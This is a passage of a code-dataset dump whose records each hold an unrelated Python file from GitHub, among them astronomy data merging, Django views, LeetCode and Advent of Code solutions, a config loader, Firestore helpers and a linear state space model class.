'vibrational_species.pickle'))\n\n\n###################################################################################################\n# merge data\n###################################################################################################\n\ndata_XCLASS = copy.deepcopy(data_N)\ndata_Gauss = copy.deepcopy(data_I)\n\nfor SSC in tqdm(SSCs):\n for specie in data_XCLASS[SSC['num']].keys():\n\n if specie in temperature_species:\n # for temperature specie fits:\n # T fitted\n # N fitted\n # w (semi-)fixed\n # v fixed\n # tau fitted implicitely\n for q in ['temperature','column density','peak opacity','integrated opacity']:\n data_XCLASS[SSC['num']][specie][q] = data_T[SSC['num']][specie][q]\n\n if specie in vibrational_species:\n # for temperature specie fits:\n # T fixed at 300K\n # N fitted\n # w (semi-)fixed\n # v fixed\n # tau fitted implicitely\n for q in ['temperature','column density','peak opacity','integrated opacity']:\n data_XCLASS[SSC['num']][specie][q] = data_vib[SSC['num']][specie][q]\n\nos.system('mkdir -p '+resultsdir)\nfnpickle(data_XCLASS, os.path.join(resultsdir, 
'data_XCLASS.pickle'))\nfnpickle(data_Gauss, os.path.join(resultsdir, 'data_Gauss.pickle'))\n\n\n###################################################################################################\n# filter bad fits\n###################################################################################################\n\n# bad fits are most easily identified by way too low column densities\n# remove a fit if its column density is lower than 10% of the median\n# replace these values with the sample median to keep the data structure equal in size, update in place\n\nfor s, ss in tqdm(data_XCLASS.items()):\n    for spx, data in ss.items():\n        for comp in np.arange(len(data['velocity']['median'])):\n\n            # get indices of bad fits: column density\n            all = data['column density']['all'][comp]\n            median = data['column density']['median'][comp]\n            bad_cd = np.append( np.where(all < 0.1*median)[0], np.where(all > 10*median)[0] )\n\n            if not spx=='CO;v=0' or (s in ['1','2'] and spx=='CS;v=0'):\n                # get indices of bad fits: linewidth\n                all = data['linewidth']['all'][comp]\n                median = data['linewidth']['median'][comp]\n                bad_lw = np.append( np.where(all > 0.*median+59.)[0], np.where(all < 0.*median+11.)[0] )\n                if len(bad_lw) > 50:\n                    bad_lw = np.array([], dtype='int64')\n            else:\n                bad_lw = np.array([], dtype='int64')\n\n            bad_idx = np.append(bad_cd, bad_lw)\n\n            # for all quantities\n            for q,quantity in data.items():\n                # get good statistics (without the bad values)\n                good_p16, good_median, good_p84 = np.percentile( np.delete(quantity['all'][comp],bad_idx), (16,50,84) )\n                quantity['median'][comp] = good_median\n                quantity['16th'][comp] = good_p16\n                quantity['84th'][comp] = good_p84\n                # replace bad values with good median\n                for bi in bad_idx:\n                    # quantity['all'][comp][bi] = good_median\n                    data_XCLASS[s][spx][q]['all'][comp][bi] = good_median\n\n\nfnpickle(data_XCLASS, os.path.join(resultsdir, 'data_XCLASS.pickle'))\n\n\n###################################################################################################\n#\n###################################################################################################\n","repo_name":"GiantMolecularCloud/NGC253-ISM-in-SSCs","sub_path":"760.merge_XCLASS.py","file_name":"760.merge_XCLASS.py","file_ext":"py","file_size_in_byte":4746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"1412071825","text":"from django.views.generic import TemplateView, View\nfrom django.shortcuts import render\nfrom django.core.paginator import Paginator\nfrom django.contrib.auth.mixins import UserPassesTestMixin, LoginRequiredMixin\nfrom social.forms import PostForm\nfrom social.models import Post, Comment\n\n# LoginRequiredMixin redirects the user to the login page if they are not logged in.\nclass HomeView(LoginRequiredMixin, View):\n    def get(self, request, *args, **kwargs):\n        logged_in_user=request.user\n        posts = Post.objects.all()\n        form = PostForm()\n        \n        context={\n            'posts': posts,\n            'form': form,\n            \n\n        }\n        return render(request, 'pages/index.html', context)\n    \n    def post(self, request,*args, **kwargs):\n        logged_in_user=request.user\n        posts = Post.objects.all()\n        form =PostForm(request.POST)\n        \n        if form.is_valid():\n            new_post = form.save(commit=False)\n            new_post.author = logged_in_user\n            new_post.save()\n        \n        \n        context={\n            'posts': posts,\n            'form':form,\n        }\n        return render(request, 'pages/index.html', 
context)","repo_name":"FrancoArguello/social_network","sub_path":"social_network/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"7354018207","text":"'''\n@author:noc\n@time:2020-03-21\n@url:https://leetcode-cn.com/problems/water-and-jug-problem/\n'''\n\nimport math\n\n'''\nSolution 1: Bezout's identity: for integers a and b, ax + by = c has integer solutions x, y exactly when c is a multiple of gcd(a, b); if c is not a multiple of gcd(a, b), there is no integer solution.\nThe operations this problem allows are:\nfill either jug completely\nempty either jug completely\npour water from one jug into the other until the target jug is full or the source jug is empty\nAfter any operation the two jugs can never both be partially filled, so the total amount of water can only change by +x, -x, +y or -y. Thanks to this property, the problem reduces to finding integer solutions of ax + by = z.\nTime complexity: O(logN), the cost of computing the greatest common divisor with the Euclidean algorithm\nSpace complexity: O(1)\n\nSolution 2: use depth-first search (DFS) to check every reachable state one by one, and return as soon as a state satisfies the condition.\nFrom the allowed operations, every state can transition in the following ways:\n1 fill jug x\n2 fill jug y\n3 empty jug x\n4 empty jug y\n5 pour x into y until y is full or x is empty\n6 pour y into x until x is full or y is empty\nWe use remain_x and remain_y for the amount of water in x and y, a stack to simulate the DFS recursion, and a set called seen to store every state that has already been checked.\nTime complexity: O(xy) \nSpace complexity: O(xy)\n'''\n\nclass Solution:\n    def canMeasureWater(self, x, y, z):\n        if x + y < z: return False\n        if x == 0 or y == 0:\n            return z == 0 or x + y == z\n        return z % math.gcd(x, y) == 0\n\n\n        # seen = set()\n        # stack = [(0, 0)]\n        # while stack:\n        #     remain_x, remain_y = stack.pop()\n        #     if remain_x == z or remain_y == z or remain_x + remain_y == z:\n        #         return True\n        #     if (remain_x, remain_y) in seen:\n        #         continue\n        #     seen.add((remain_x, remain_y))\n        #     stack.append((remain_x, y))  # fill jug y\n        #     stack.append((x, remain_y))  # fill jug x\n        #     stack.append((0, remain_y))  # empty jug x\n        #     stack.append((remain_x, 0))  # empty jug y\n        #     # Explanation of the next two transitions: pouring one jug into the other stops when the target is full or the source is empty, so min() picks the smaller of the target's free space and the source's remaining water\n        #     # e.g. if the source holds 1 and the target has 2 of free space, the target is still not full after the pour\n        #     stack.append((remain_x - min(remain_x, y - remain_y), remain_y + min(remain_x, y - remain_y)))  # pour x into y until y is full or x is empty\n        #     stack.append((remain_x + min(remain_y, x - remain_x), remain_y - min(remain_y, x - remain_x)))  # pour y into x until x is full or y is empty\n        return False\n\nif __name__ == '__main__':\n    x, y, z = 3, 5, 4\n    out = Solution().canMeasureWater(x, y, z)\n    print(out)","repo_name":"NonCover/-","sub_path":"leetcode.365.水壶问题.py","file_name":"leetcode.365.水壶问题.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"8"} +{"seq_id":"9545483365","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# boxlayout.py\nimport sys\nfrom PyQt4 import QtGui, QtCore\nclass Help(QtGui.QWidget):\n    def __init__(self):\n        QtGui.QWidget.__init__(self)\n        self.setWindowTitle('CowLog Help')\n        self.setWindowIcon(QtGui.QIcon('icons/help.png'))\n        ok = QtGui.QPushButton(\"Close\", self)\n        #ok.setMaximumWidth(80)\n        self.connect(ok, QtCore.SIGNAL('clicked()'), QtCore.SLOT('hide()'))\n        #title = QtGui.QLabel(self)\n        #title.setText('
Main help
')\n about = QtGui.QTextBrowser(self)\n #about.setAlignment(QtCore.Qt.AlignCenter)\n about.setMinimumSize(400, 400)\n #CowLog help\n #about.setHtml(\"\"\"\"\"\")\n about.setSource(QtCore.QUrl('manual.html'))\n \n grid = QtGui.QGridLayout(self)\n grid.setSpacing(7)\n #grid.addWidget(title, 1, 1)\n grid.addWidget(about, 2, 0, 5, 3)\n grid.addWidget(ok, 7, 1)\n self.show()\n\n","repo_name":"PigLardLord/BAS","sub_path":"source/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"73013050502","text":"import sys\nsys.path.append('..')\nimport my_parser as p\nimport heapq\n\nlines = p.input_as_lines('inputs/inp.txt')\n\nG = [[int(el) for el in line] for line in lines]\nR = len(G)\nC = len(G[0])\n\n# north, east, south, west\nDR = [-1, 0, 1, 0]\nDC = [0, 1, 0, -1]\n\n\ndef get_score(distances):\n \"\"\"Note Got lucky with the end point being further than 4 points from a\n turn otherwise would have had to change the score calculation.\"\"\"\n min_dist = float('inf')\n for k, v in distances.items():\n if k[0] == R - 1 and k[1] == C - 1:\n if v < min_dist:\n min_dist = v\n return min_dist\n\n\ndef get_dirs(part, d, con):\n dirs = [0, 1, 2, 3]\n dirs.remove((d + 2) % 4)\n if part == 1:\n\n if con == 3:\n dirs.remove(d)\n else:\n if con == 10:\n dirs.remove(d)\n elif con < 4:\n dirs = [d]\n\n return dirs\n\n\nfor part in [1, 2]:\n distances = {}\n visited = set()\n pq = [(0, 0, 0, 1, 0), (0, 0, 0, 2, 0)] # (row, col, dir, consecutive, distance)\n while pq:\n l, r, c, d, con = heapq.heappop(pq)\n\n if (r, c, d, con) in distances:\n if l < distances[(r, c, d, con)]:\n distances[(r, c, d, con)] = l\n else:\n continue\n else:\n distances[(r, c, d, con)] = l\n\n dirs = get_dirs(part, d, con)\n\n for nd in dirs:\n nr = r + DR[nd]\n nc = c + DC[nd]\n\n if nr < 0 or nc < 0 or nr >= R or nc >= C:\n continue\n\n nl = l + G[nr][nc]\n if nd == d:\n heapq.heappush(pq, (nl, nr, nc, nd, con + 1))\n else:\n heapq.heappush(pq, (nl, nr, nc, nd, 1))\n\n\n print(get_score(distances))\n\n","repo_name":"PietPjotr/advent-of-code","sub_path":"2023/day_17/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"28793517361","text":"import configparser\nimport os\n\nfrom dataclasses import dataclass, field\nfrom titr import CONFIG_FILE\n\n\n@dataclass\nclass Config:\n outlook_account: str = \"\"\n default_category: int = 0\n default_task: str = \"\"\n calendar_name: str = \"\"\n skip_event_names: list[str] = field(default_factory=list)\n skip_event_status: list[int] = field(default_factory=list)\n category_list: dict = field(default_factory=dict)\n task_list: dict = field(default_factory=dict)\n skip_all_day_events: bool = True\n max_duration: float = 9\n deep_work_goal: float = 0\n incidental_tasks: list[str] = field(default_factory=list)\n source_file: str = \"\"\n\n\ndef create_default_config():\n \"\"\"Create a default configuration file\"\"\"\n # Ensure we don't accidentally overwrite config\n if os.path.isfile(CONFIG_FILE):\n raise FileExistsError(f\"Config file '{CONFIG_FILE}' already exists!\")\n config = configparser.ConfigParser(allow_no_value=True)\n user_email: str = input(\"Enter your email to connect to outlook: \")\n config[\"outlook_options\"] = {\n \"email\": user_email,\n \"calendar_name\": \"Calendar\",\n \"# skip events with given status codes, comma separated 
list\": None,\n \"# 0 = free\": None,\n \"# 1 = tentative\": None,\n \"# 2 = busy\": None,\n \"# 3 = out of office\": None,\n \"# 4 = working elsewhere\": None,\n \"skip_event_status\": \"0, 3\",\n \"skip_all_day_events\": \"yes\",\n \"# use comma separated list of calendar event names to be skipped\": None,\n \"skip_event_names\": \"\",\n }\n config[\"general_options\"] = {\n \"max_entry_duration\": \"9\",\n \"default_category\": \"2\",\n \"default_task\": \"d\",\n \"deep_work_goal\": \"300\",\n }\n config[\"categories\"] = {\n 2: \"Deep Work\",\n 3: \"Email\",\n 4: \"Meetings\",\n }\n config[\"tasks\"] = {\n \"i\": \"Incidental\",\n \"d\": \"Default Task\",\n }\n config[\"incidental_tasks\"] = {\n \"keys\": \"i\",\n }\n config_path: str = os.path.dirname(CONFIG_FILE)\n if not os.path.exists(config_path): # pragma: no cover\n os.mkdir(config_path)\n with open(CONFIG_FILE, \"w\") as config_file_handle:\n config.write(config_file_handle)\n\n return CONFIG_FILE\n\n\ndef load_config(config_file=CONFIG_FILE) -> Config:\n \"\"\"Load and validate configuration options.\"\"\"\n # look for a config file in the working directory\n # if it doesn't exist, create it with some default options\n if not os.path.isfile(config_file):\n config_file = create_default_config()\n config = Config()\n parser = configparser.ConfigParser()\n parser.read(config_file)\n for key in parser[\"categories\"]:\n try:\n cat_key = int(key)\n except ValueError as err:\n print(f\"Warning: Skipped category key {key} in {config_file}: {err}\")\n continue\n config.category_list[cat_key] = parser[\"categories\"][key]\n for key in parser[\"tasks\"]:\n if len(key) > 1:\n print(f\"Warning: Skipped task key {key} in {config_file}: len > 1.\")\n continue\n if key.isdigit():\n print(f\"Warning: Skipped task key {key} in {config_file}: Digit\")\n continue\n config.task_list[key] = parser[\"tasks\"][key]\n\n config.source_file = config_file\n config.default_task = parser[\"general_options\"][\"default_task\"]\n config.incidental_tasks = parser[\"incidental_tasks\"][\"keys\"].split(\", \")\n config.incidental_tasks = list(map(str.strip, config.incidental_tasks))\n if config.default_task not in config.task_list.keys():\n print(\n \"Warning: Default tasks '\",\n config.default_task,\n \"' not found in \",\n config_file,\n )\n config.default_task = list(config.task_list.keys())[0]\n\n # TODO: Error handling for default category as not an int\n config.default_category = int(parser[\"general_options\"][\"default_category\"])\n if config.default_category not in config.category_list.keys():\n config.default_category = int(list(config.category_list.keys())[0])\n print(\n \"Warning: Default category '\",\n config.default_category,\n \"'not found in \",\n config_file,\n )\n\n # TODO: Error handling\n config.max_duration = float(parser[\"general_options\"][\"max_entry_duration\"])\n config.deep_work_goal = float(parser[\"general_options\"][\"deep_work_goal\"])\n\n config.outlook_account = parser[\"outlook_options\"][\"email\"]\n config.calendar_name = parser[\"outlook_options\"][\"calendar_name\"]\n config.skip_event_names = [\n event.strip() for event in parser[\"outlook_options\"][\"skip_event_names\"].split(\",\")\n ]\n # TODO: Error handling\n config.skip_event_status = [\n int(status) for status in parser[\"outlook_options\"][\"skip_event_status\"].split(\",\")\n ]\n config.skip_all_day_events = parser.getboolean(\"outlook_options\", \"skip_all_day_events\")\n # print(f\"Loaded config from {config_file=}\")\n\n return 
config\n","repo_name":"blairfrandeen/titr","sub_path":"src/titr/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"8"} +{"seq_id":"8431634994","text":"from django.urls import path\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n    path('armurerie/', views.armory, name=\"armory\"),\r\n    path('armurerie/iframe/', views.armoryIframe, name=\"armory_iframe\"),\r\n    path('armes/', views.weapons, name=\"weapons\"),\r\n    path('armes//', views.weapon, name=\"weapon\"),\r\n    path('add/weapon', views.addWeapon, name=\"add_weapon\"),\r\n    path('armes/edit/', views.editWeapon, name=\"edit_weapon\"),\r\n    path('armes/delete/', views.deleteWeapon, name=\"delete_weapon\"),\r\n    path('armes/confirm/', views.confirmWeapon, name=\"confirm_weapon\"),\r\n\r\n    path('armures/', views.armors, name=\"armors\"),\r\n    path('armures//', views.armor, name=\"armor\"),\r\n    path('add/armure', views.addArmor, name=\"add_armor\"),\r\n    path('armures/edit/', views.editArmor, name=\"edit_armor\"),\r\n    path('armures/delete/', views.deleteArmor, name=\"delete_armor\"),\r\n    path('armures/confirm/', views.confirmArmor, name=\"confirm_armor\"),\r\n\r\n    path('addSheet/', views.addStuffSheet, name=\"add_stuffSheet\"),\r\n    path('confirmSheet/', views.confirmStuffSheet,\r\n         name=\"confirm_stuffSheet\"),\r\n    path('deleteSheet/', views.deleteStuffSheet, name=\"delete_stuffSheet\"),\r\n\r\n    path('addCustom/', views.addCustomSheet, name=\"add_customSheet\"),\r\n    path('confirmCustom/', views.confirmCustomSheet,\r\n         name=\"confirm_customSheet\"),\r\n    path('deleteCustom/', views.deleteCustomSheet, name=\"delete_customSheet\"),\r\n]\r\n\r\n\r\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\r\n","repo_name":"y-janssens/Sigfroi","sub_path":"equipement/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"8"} +{"seq_id":"43753145272","text":"# -*- coding: utf-8 -*-\n'''\nController: mainly responsible for driving the whole pipeline: how to sample, and how to pick the next sample based on the structures obtained and their results\n'''\nimport random\nfrom Transformation import *\nclass RandomController(object):\n\t\"\"\"Random controller: picks sampling actions at random\"\"\"\n\tdef __init__(self, action_list):\n\t\tsuper(RandomController, self).__init__()\n\t\tself.action_list = action_list\n\n\tdef stage1_select_action(self, input_model):\n\t\tregular_name_list = ['regular_1', 'regular_2', 'regular_3', 'regular_4', 'regular_5']\n\t\tstage_action_list = self.action_list['stage_1']\n\t\taction = random.choice(stage_action_list)\n\t\tif action == 'delete_decoder' and input_model.decoder:\n\t\t\treturn delete_decoder(input_model)\n\t\tblock = random.choice(regular_name_list)\n\t\tif not action == 'delete_decoder':\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\t# 'action' names a transformation imported from Transformation; globals() is used because locals() inside a method does not see module-level names\n\t\t\t\t\tnew_model = globals()[action](block,input_model)\n\t\t\t\t\tbreak\n\t\t\t\texcept AssertionError:\n\t\t\t\t\tblock = random.choice(regular_name_list)\n\t\t\t\t\tcontinue\n\t\treturn new_model\n\n\t@staticmethod\n\tdef stage2_select_action(input_model):\n\t\toutput_name = input_model.output_name\n\t\tfirst_node = random.choice(output_name[0:-2])\n\t\tfirst_node_index = output_name.index(first_node)\n\t\tsecond_node = random.choice(output_name[first_node_index:-1])\n\t\toutput_channel = input_model.output_channel\n\t\tfirst_node_spatial_size = output_channel[first_node_index][0]\n\t\tfirst_node_channel_size = 
output_channel[first_node_index][1]\n\t\tsecond_node_spatial_size = output_channel[second_node][0]\n\t\tsecond_node_channel_size = output_channel[second_node][1]\n\t\tif first_node_spatial_size == second_node_spatial_size:\n\t\t\tspatial_action = None\n\t\telif first_node_spatial_size > second_node_spatial_size:\n\t\t\tspatial_action = random.choice(['max','avg','3x3_conv'])\n\t\telse:\n\t\t\tspatial_action = 'up_conv'\n\t\tconnection = random.choice(['add','concat'])\n\t\tchannel_dim = None\n\t\tif connection == 'concat':\n\t\t\tchannel_operation = None\n\t\telse:\n\t\t\tif first_node_channel_size == second_node_channel_size:\n\t\t\t\tchannel_operation = None\n\t\t\telse:\n\t\t\t\tchannel_operation = '1x1_conv'\n\t\t\t\tchannel_dim = second_node_channel_size\n\t\treturn add_connection(input_model,first_node,second_node,connection,spatial_action,channel_operation,channel_dim)\n\n\n\n\n\n\t# def select_action(self,stage,model):\n\t# \tstage_action_list = self.action_list[stage]\n\t# \tif stage == 'stage_1':\n\t# \t\taction = random.choice(stage_action_list)\n\t#\n\t# \tpass\n\n\n\t\t\n","repo_name":"zhengxiawu/efficient_image_to_image_NAS","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"28981924870","text":"class Solution:\n def isAnagram(self, s, t):\n if len(s) != len(t):\n return False\n length = len(s)\n dicts,dictt = {},{}\n for i in range(length):\n if s[i] not in dicts:\n dicts[s[i]] = 0\n if t[i] not in dictt:\n dictt[t[i]] = 0\n dicts[s[i]] += 1\n dictt[t[i]] += 1\n\n return dicts == dictt\n","repo_name":"1019572917/daily","sub_path":"1.26isAnagram242.py","file_name":"1.26isAnagram242.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"9740949524","text":"import firebase_admin\nfrom firebase_admin import firestore\n\ndef init_firestore():\n import firebase_admin\n from firebase_admin import credentials\n from firebase_admin import firestore\n\n # Use a service account.\n cred = credentials.Certificate('service_account.json')\n app = firebase_admin.initialize_app(cred)\n db = firestore.client()\n\ndef read_data(collection_name, doc_name):\n db = firestore.client()\n doc_ref = db.collection(collection_name).document(doc_name)\n doc = doc_ref.get()\n if doc.exists:\n return f'data: {doc.to_dict()}'\n return \"Document does not exist.\"\n\ndef read_alldocs(collection_name):\n db = firestore.client()\n docs = db.collection(collection_name).stream()\n docs_list = []\n for doc in docs:\n docs_list.append(doc.to_dict())\n return docs_list\n\ndef add_data(collection_name, doc_name, data):\n db = firestore.client()\n doc_ref = db.collection(collection_name).document(doc_name)\n doc_ref.set(data)\n\ndef delete_data(collection_name, doc_name):\n db = firestore.client()\n doc_ref = db.collection(collection_name).document(doc_name)\n doc_ref.delete()\n","repo_name":"yukti99/Student-Group-Finder-App","sub_path":"firestore.py","file_name":"firestore.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"16386438429","text":"\"\"\"\nComputes quantities associated with the Gaussian linear state space model.\n\nReferences\n----------\n\nhttps://lectures.quantecon.org/py/linear_models.html\n\n\"\"\"\n\nfrom textwrap import dedent\nimport numpy as 
np\nfrom numpy.random import multivariate_normal\nfrom scipy.linalg import solve\nfrom numba import jit\nfrom .util import check_random_state\n\n\n@jit\ndef simulate_linear_model(A, x0, v, ts_length):\n r\"\"\"\n This is a separate function for simulating a vector linear system of\n the form\n\n .. math::\n\n x_{t+1} = A x_t + v_t\n\n given :math:`x_0` = x0\n\n Here :math:`x_t` and :math:`v_t` are both n x 1 and :math:`A` is n x n.\n\n The purpose of separating this functionality out is to target it for\n optimization by Numba. For the same reason, matrix multiplication is\n broken down into for loops.\n\n Parameters\n ----------\n A : array_like or scalar(float)\n Should be n x n\n x0 : array_like\n Should be n x 1. Initial condition\n v : np.ndarray\n Should be n x ts_length-1. Its t-th column is used as the time t\n shock :math:`v_t`\n ts_length : int\n The length of the time series\n\n Returns\n --------\n x : np.ndarray\n Time series with ts_length columns, the t-th column being :math:`x_t`\n \"\"\"\n A = np.asarray(A)\n n = A.shape[0]\n x = np.empty((n, ts_length))\n x[:, 0] = x0\n for t in range(ts_length-1):\n # x[:, t+1] = A.dot(x[:, t]) + v[:, t]\n for i in range(n):\n x[i, t+1] = v[i, t] # Shock\n for j in range(n):\n x[i, t+1] += A[i, j] * x[j, t] # Dot Product\n return x\n\n\nclass LinearStateSpace:\n r\"\"\"\n A class that describes a Gaussian linear state space model of the\n form:\n\n .. math::\n\n x_{t+1} = A x_t + C w_{t+1}\n\n y_t = G x_t + H v_t\n\n where :math:`{w_t}` and :math:`{v_t}` are independent and standard normal\n with dimensions k and l respectively. The initial conditions are\n :math:`\\mu_0` and :math:`\\Sigma_0` for :math:`x_0 \\sim N(\\mu_0, \\Sigma_0)`.\n When :math:`\\Sigma_0=0`, the draw of :math:`x_0` is exactly :math:`\\mu_0`.\n\n Parameters\n ----------\n A : array_like or scalar(float)\n Part of the state transition equation. It should be `n x n`\n C : array_like or scalar(float)\n Part of the state transition equation. It should be `n x m`\n G : array_like or scalar(float)\n Part of the observation equation. It should be `k x n`\n H : array_like or scalar(float), optional(default=None)\n Part of the observation equation. It should be `k x l`\n mu_0 : array_like or scalar(float), optional(default=None)\n This is the mean of initial draw and is `n x 1`\n Sigma_0 : array_like or scalar(float), optional(default=None)\n This is the variance of the initial draw and is `n x n` and\n also should be positive definite and symmetric\n\n Attributes\n ----------\n A, C, G, H, mu_0, Sigma_0 : see Parameters\n n, k, m, l : scalar(int)\n The dimensions of x_t, y_t, w_t and v_t respectively\n\n \"\"\"\n\n def __init__(self, A, C, G, H=None, mu_0=None, Sigma_0=None):\n self.A, self.G, self.C = list(map(self.convert, (A, G, C)))\n # = Check Input Shapes = #\n ni, nj = self.A.shape\n if ni != nj:\n raise ValueError(\"Matrix A (shape: %s) needs to be square\" % (self.A.shape))\n if ni != self.C.shape[0]:\n raise ValueError(\"Matrix C (shape: %s) does not have compatible dimensions with A. 
It should be shape: %s\" % (self.C.shape, (ni,1)))\n self.m = self.C.shape[1]\n self.k, self.n = self.G.shape\n if self.n != ni:\n raise ValueError(\"Matrix G (shape: %s) does not have compatible dimensions with A (%s)\"%(self.G.shape, self.A.shape))\n if H is None:\n self.H = None\n self.l = None\n else:\n self.H = self.convert(H)\n self.l = self.H.shape[1]\n if mu_0 is None:\n self.mu_0 = np.zeros((self.n, 1))\n else:\n self.mu_0 = self.convert(mu_0)\n self.mu_0.shape = self.n, 1\n if Sigma_0 is None:\n self.Sigma_0 = np.zeros((self.n, self.n))\n else:\n self.Sigma_0 = self.convert(Sigma_0)\n\n def __repr__(self):\n return self.__str__()\n\n def __str__(self):\n m = \"\"\"\\\n Linear Gaussian state space model:\n - dimension of state space : {n}\n - number of innovations : {m}\n - dimension of observation equation : {k}\n \"\"\"\n return dedent(m.format(n=self.n, k=self.k, m=self.m))\n\n def convert(self, x):\n \"\"\"\n Convert array_like objects (lists of lists, floats, etc.) into\n well formed 2D NumPy arrays\n\n \"\"\"\n return np.atleast_2d(np.asarray(x, dtype='float'))\n\n def simulate(self, ts_length=100, random_state=None):\n r\"\"\"\n Simulate a time series of length ts_length, first drawing\n\n .. math::\n\n x_0 \\sim N(\\mu_0, \\Sigma_0)\n\n Parameters\n ----------\n ts_length : scalar(int), optional(default=100)\n The length of the simulation\n random_state : int or np.random.RandomState, optional\n Random seed (integer) or np.random.RandomState instance to set\n the initial state of the random number generator for\n reproducibility. If None, a randomly initialized RandomState is\n used.\n\n Returns\n -------\n x : array_like(float)\n An n x ts_length array, where the t-th column is :math:`x_t`\n y : array_like(float)\n A k x ts_length array, where the t-th column is :math:`y_t`\n\n \"\"\"\n random_state = check_random_state(random_state)\n\n x0 = multivariate_normal(self.mu_0.flatten(), self.Sigma_0)\n w = random_state.randn(self.m, ts_length-1)\n v = self.C.dot(w) # Multiply each w_t by C to get v_t = C w_t\n # == simulate time series == #\n x = simulate_linear_model(self.A, x0, v, ts_length)\n\n if self.H is not None:\n v = random_state.randn(self.l, ts_length)\n y = self.G.dot(x) + self.H.dot(v)\n else:\n y = self.G.dot(x)\n\n return x, y\n\n def replicate(self, T=10, num_reps=100, random_state=None):\n r\"\"\"\n Simulate num_reps observations of :math:`x_T` and :math:`y_T` given\n :math:`x_0 \\sim N(\\mu_0, \\Sigma_0)`.\n\n Parameters\n ----------\n T : scalar(int), optional(default=10)\n The period that we want to replicate values for\n num_reps : scalar(int), optional(default=100)\n The number of replications that we want\n random_state : int or np.random.RandomState, optional\n Random seed (integer) or np.random.RandomState instance to set\n the initial state of the random number generator for\n reproducibility. 
If None, a randomly initialized RandomState is\n used.\n\n Returns\n -------\n x : array_like(float)\n An n x num_reps array, where the j-th column is the j_th\n observation of :math:`x_T`\n\n y : array_like(float)\n A k x num_reps array, where the j-th column is the j_th\n observation of :math:`y_T`\n\n \"\"\"\n random_state = check_random_state(random_state)\n\n x = np.empty((self.n, num_reps))\n for j in range(num_reps):\n x_T, _ = self.simulate(ts_length=T+1, random_state=random_state)\n x[:, j] = x_T[:, -1]\n if self.H is not None:\n v = random_state.randn(self.l, num_reps)\n y = self.G.dot(x) + self.H.dot(v)\n else:\n y = self.G.dot(x)\n\n return x, y\n\n def moment_sequence(self):\n r\"\"\"\n Create a generator to calculate the population mean and\n variance-convariance matrix for both :math:`x_t` and :math:`y_t`\n starting at the initial condition (self.mu_0, self.Sigma_0).\n Each iteration produces a 4-tuple of items (mu_x, mu_y, Sigma_x,\n Sigma_y) for the next period.\n\n Yields\n ------\n mu_x : array_like(float)\n An n x 1 array representing the population mean of x_t\n mu_y : array_like(float)\n A k x 1 array representing the population mean of y_t\n Sigma_x : array_like(float)\n An n x n array representing the variance-covariance matrix\n of x_t\n Sigma_y : array_like(float)\n A k x k array representing the variance-covariance matrix\n of y_t\n\n \"\"\"\n # == Simplify names == #\n A, C, G, H = self.A, self.C, self.G, self.H\n # == Initial moments == #\n mu_x, Sigma_x = self.mu_0, self.Sigma_0\n\n while 1:\n mu_y = G.dot(mu_x)\n if H is None:\n Sigma_y = G.dot(Sigma_x).dot(G.T)\n else:\n Sigma_y = G.dot(Sigma_x).dot(G.T) + H.dot(H.T)\n\n yield mu_x, mu_y, Sigma_x, Sigma_y\n\n # == Update moments of x == #\n mu_x = A.dot(mu_x)\n Sigma_x = A.dot(Sigma_x).dot(A.T) + C.dot(C.T)\n\n def stationary_distributions(self, max_iter=200, tol=1e-5):\n r\"\"\"\n Compute the moments of the stationary distributions of :math:`x_t` and\n :math:`y_t` if possible. 
Computation is by iteration, starting from\n the initial conditions self.mu_0 and self.Sigma_0\n\n Parameters\n ----------\n max_iter : scalar(int), optional(default=200)\n The maximum number of iterations allowed\n tol : scalar(float), optional(default=1e-5)\n The tolerance level that one wishes to achieve\n\n Returns\n -------\n mu_x_star : array_like(float)\n An n x 1 array representing the stationary mean of :math:`x_t`\n mu_y_star : array_like(float)\n An k x 1 array representing the stationary mean of :math:`y_t`\n Sigma_x_star : array_like(float)\n An n x n array representing the stationary var-cov matrix\n of :math:`x_t`\n Sigma_y_star : array_like(float)\n An k x k array representing the stationary var-cov matrix\n of :math:`y_t`\n\n \"\"\"\n # == Initialize iteration == #\n m = self.moment_sequence()\n mu_x, mu_y, Sigma_x, Sigma_y = next(m)\n i = 0\n error = tol + 1\n\n # == Loop until convergence or failure == #\n while error > tol:\n\n if i > max_iter:\n fail_message = 'Convergence failed after {} iterations'\n raise ValueError(fail_message.format(max_iter))\n\n else:\n i += 1\n mu_x1, mu_y1, Sigma_x1, Sigma_y1 = next(m)\n error_mu = np.max(np.abs(mu_x1 - mu_x))\n error_Sigma = np.max(np.abs(Sigma_x1 - Sigma_x))\n error = max(error_mu, error_Sigma)\n mu_x, Sigma_x = mu_x1, Sigma_x1\n\n # == Prepare return values == #\n mu_x_star, Sigma_x_star = mu_x, Sigma_x\n mu_y_star, Sigma_y_star = mu_y1, Sigma_y1\n\n return mu_x_star, 